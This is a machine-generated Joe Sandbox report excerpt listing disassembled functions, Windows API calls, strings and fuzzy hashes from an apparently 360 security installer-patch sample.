                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B127CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B127D7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle$CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1378612225-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,6BEFC0AE), ref: 6BF2E92A
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6BF2E959
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6BF2E964
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateEventHandleObjectSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2631291778-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00B8059E,?,00BFCDA4,?,00B8059E,?), ref: 00B80323
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00B8059E,C0000000,00000001,00000000,00000001,00000080,00000000,?,00B8059E,?), ref: 00B8033E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B80367
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CloseCreateDeleteHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3273607511-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CDDDF4E
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __FF_MSGBANNER.LIBCMT ref: 6CDDD4A1
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: __NMSG_WRITE.LIBCMT ref: 6CDDD4A8
                                                                                                                                                                                                                • Part of subcall function 6CDDD47E: RtlAllocateHeap.NTDLL(00000000,6CDDDF44,?,?,?,?,6CDDDF53,?), ref: 6CDDD4F5
                                                                                                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 6CDDDF71
                                                                                                                                                                                                                • Part of subcall function 6CDDDF19: std::exception::exception.LIBCMT ref: 6CDDDF25
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CDDDF93
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3715980512-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __FF_MSGBANNER.LIBCMT ref: 6BF3858D
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: __NMSG_WRITE.LIBCMT ref: 6BF38594
                                                                                                                                                                                                                • Part of subcall function 6BF3856A: RtlAllocateHeap.NTDLL(00000000,-0000000D,00000001,00000000,00000000,?,6BF42E8E,00000002,00000001,00000002,?,6BF3F8B1,00000018,6BF7C4F0,0000000C,6BF3F942), ref: 6BF385E1
                                                                                                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 6BF38462
                                                                                                                                                                                                                • Part of subcall function 6BF3840A: std::exception::exception.LIBCMT ref: 6BF38416
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6BF38484
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3715980512-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF194C1
                                                                                                                                                                                                                • Part of subcall function 6BF193DF: UrlCanonicalizeW.SHLWAPI(?,?,00000824,20000000), ref: 6BF19429
                                                                                                                                                                                                                • Part of subcall function 6BEF1768: _wcslen.LIBCMT ref: 6BEF176F
                                                                                                                                                                                                                • Part of subcall function 6BEE8514: char_traits.LIBCPMT ref: 6BEE8539
                                                                                                                                                                                                                • Part of subcall function 6BEE8FA1: char_traits.LIBCPMT ref: 6BEE901B
                                                                                                                                                                                                                • Part of subcall function 6BEED55B: _wcslen.LIBCMT ref: 6BEED562
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcslenchar_traits$Canonicalize_memset
                                                                                                                                                                                                              • String ID: ://
                                                                                                                                                                                                              • API String ID: 1237851060-1869659232
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset
                                                                                                                                                                                                              • String ID: DNS--CName:
                                                                                                                                                                                                              • API String ID: 2102423945-2042605141
                                                                                                                                                                                                              • Opcode ID: f71dcb98dab9560eeef630fd26afbb595d5b552610caa4e074db4edad5cbb725
                                                                                                                                                                                                              • Instruction ID: 2474453e8ac44136aceff9442a3db938e11a661a8f6e1b7356dc3cdde4479ea3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f71dcb98dab9560eeef630fd26afbb595d5b552610caa4e074db4edad5cbb725
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8161AD3391160AAFDB258FB4CD20A9EBBB6BF15704F00096DE45A92930DF39A955EF40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF11523
                                                                                                                                                                                                                • Part of subcall function 6BF0C7D8: __EH_prolog3.LIBCMT ref: 6BF0C7DF
                                                                                                                                                                                                                • Part of subcall function 6BF0C7D8: GetTickCount.KERNEL32 ref: 6BF0C85B
                                                                                                                                                                                                                • Part of subcall function 6BF0C7D8: _memset.LIBCMT ref: 6BF0C964
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s, xrefs: 6BF11577, 6BF1160D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_memset$CountTickwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.] __CreateTask Init task fail. Id:%d, Pdown:%s, File:%s
                                                                                                                                                                                                              • API String ID: 4122227224-1580467494
                                                                                                                                                                                                              • Opcode ID: 5dff2e30d0075aea53d0aa4a857b3bfdd8dfe690088fbad42b9036960e35bdc7
                                                                                                                                                                                                              • Instruction ID: 9bcfc46c6cce648130d8e211dfae8852f7484721341f25fbcb873e9f898dc3e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dff2e30d0075aea53d0aa4a857b3bfdd8dfe690088fbad42b9036960e35bdc7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA21D277700217BBCF015FB88CA196E7667AF94308F00492CF9169A2B0DF7E8A11A761
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick
                                                                                                                                                                                                              • String ID: Login begin Timer
                                                                                                                                                                                                              • API String ID: 536389180-3628901022
                                                                                                                                                                                                              • Opcode ID: 422e62492c9bebbf55dc627c92e41207500a896b10d6c0a4a94009fb416c5251
                                                                                                                                                                                                              • Instruction ID: b73f150e270a0dcfcfd008f988ee0c6939ace0e2fcf287a4dd4e14fe81df7161
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 422e62492c9bebbf55dc627c92e41207500a896b10d6c0a4a94009fb416c5251
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1310673A097A19EE725DF74D4E875ABBE19B41304F0009AEC59A87270D73BA84CC7D1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,6BF35999,6BFCC810,00000000,?), ref: 6BF35F2C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread
                                                                                                                                                                                                              • String ID: tr.p.360.cn
                                                                                                                                                                                                              • API String ID: 2422867632-613191693
                                                                                                                                                                                                              • Opcode ID: 929c62f73469887e6e9f2f6a61c51652e4ebd06cc7d6089ca08778fa331d555c
                                                                                                                                                                                                              • Instruction ID: 201185b0e11984f4da07b31f4cc112057d666d31ecc7c5b0edb94fcec482ea8b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 929c62f73469887e6e9f2f6a61c51652e4ebd06cc7d6089ca08778fa331d555c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40018432120327EEDF108F21CC40AA773BCEB86354B00446EED6586160E7B6A545CBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,?,00000001,00000000,?,00000000,?,00B1E9A6,?), ref: 00B1E80F
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _memset.LIBCMT ref: 00B1EA12
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncpy.LIBCMT ref: 00B1EA29
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA3C
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA53
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA66
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA7D
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EA90
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: _wcsncat.LIBCMT ref: 00B1EAA7
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: GetActiveWindow.USER32 ref: 00B1EAB7
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: MessageBoxW.USER32(00000000), ref: 00B1EABE
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: __wcsnicmp.LIBCMT ref: 00B1EADA
                                                                                                                                                                                                                • Part of subcall function 00B1E9E0: ShellExecuteW.SHELL32(00000000,open,http://down.360safe.com/setup.exe,00000000,00000000,00000005), ref: 00B1EB0E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcsncat$ActiveExecuteLibraryLoadMessageShellWindow__wcsnicmp_memset_wcsncpy
                                                                                                                                                                                                              • String ID: 360
                                                                                                                                                                                                              • API String ID: 4220467963-1990796034
                                                                                                                                                                                                              • Opcode ID: 020420357f3db4a4690149ee93c1a8ebf225175b227657a67159fc650e551118
                                                                                                                                                                                                              • Instruction ID: 3b2c22dddaad25cf2b0fae78e3c25a572c337d9934993328eabb39416f92e98f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020420357f3db4a4690149ee93c1a8ebf225175b227657a67159fc650e551118
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE0D872215310BADB10A7109C0AFDB63CCDF50755F10887BFA15E2080E7B0E85487A6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(80000001,SOFTWARE\LiveUpdate360,00000000,00000000,00000000,000F003F,00000000,6BF0D3A2,?,?,?,?,6BF0D3A2), ref: 6BF26F2E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID: SOFTWARE\LiveUpdate360
                                                                                                                                                                                                              • API String ID: 2289755597-1248664019
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000CCC,?,00B14728,00000000,00000000,00000CCC,00000040), ref: 00B14576
                                                                                                                                                                                                                • Part of subcall function 00B13E90: ReadFile.KERNEL32(?,?,?,?,00000000,?,00B14DC5,?,00000000,?,00000000,?,?,00B11043,?), ref: 00B13E9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3154509469-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BEEA0FC
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,0000000C,?,?,?,?,?,?,?,?,00000024), ref: 6BEEA2FC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DeleteFileH_prolog3_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1756631919-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BF2E197
                                                                                                                                                                                                                • Part of subcall function 6BF2C56B: GetCurrentThreadId.KERNEL32 ref: 6BF2C56F
                                                                                                                                                                                                                • Part of subcall function 6BF2C56B: GetTickCount.KERNEL32 ref: 6BF2C583
                                                                                                                                                                                                                • Part of subcall function 6BF2C56B: GetTickCount.KERNEL32 ref: 6BF2C595
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF2E1A3
                                                                                                                                                                                                                • Part of subcall function 6BF1A60A: __EH_prolog3.LIBCMT ref: 6BF1A611
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3$CurrentThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1756952440-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientRectShowWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2134488367-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00001000,?,00000000), ref: 00B800AC
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00B800EF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                                              • Opcode ID: 536cb6291de61f2fab5efb151585312b75a96548879335c57f2bbf11fd3e87e6
                                                                                                                                                                                                              • Instruction ID: e76fef5ebe2f69fd6bbf19e9aff012442313152f39b9c78a3c7bdb748ab6da36
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 536cb6291de61f2fab5efb151585312b75a96548879335c57f2bbf11fd3e87e6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D318B71A102099FEB70EEA5CC45BAEB3B8FF45354F240479E858E7292DB309909CF10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF1AE44
                                                                                                                                                                                                                • Part of subcall function 6BF16EF2: GetTickCount.KERNEL32 ref: 6BF16EFF
                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 6BF1AEAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1305442257-0
                                                                                                                                                                                                              • Opcode ID: 1399e4966054b0e52a041e9416c461225680ba3fec9a3748c0b3832c430da1d8
                                                                                                                                                                                                              • Instruction ID: 5ad650c484549ecc7c69870ddf6901107279e9b1008e1951099bdbcf4814d14b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1399e4966054b0e52a041e9416c461225680ba3fec9a3748c0b3832c430da1d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD319372A04605BFCF15DBB4C885EEFBBB9FF04354F008959E115A71A0DB38A915DB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchchar_traits
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1964944973-0
                                                                                                                                                                                                              • Opcode ID: 12fdfbf1302b8cdd142340ec34aa1ae1cce60caef44bb93a2ad374210687c381
                                                                                                                                                                                                              • Instruction ID: 06c5494d3e3f7f887ceca752b0bc830d26343e111b2aa8b13805ef0a9e5eab1a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12fdfbf1302b8cdd142340ec34aa1ae1cce60caef44bb93a2ad374210687c381
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9113832A04112ABDB04CF64C841B5CB376FF54314F30821AE919EB2C0D779AAA2C7E1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmp
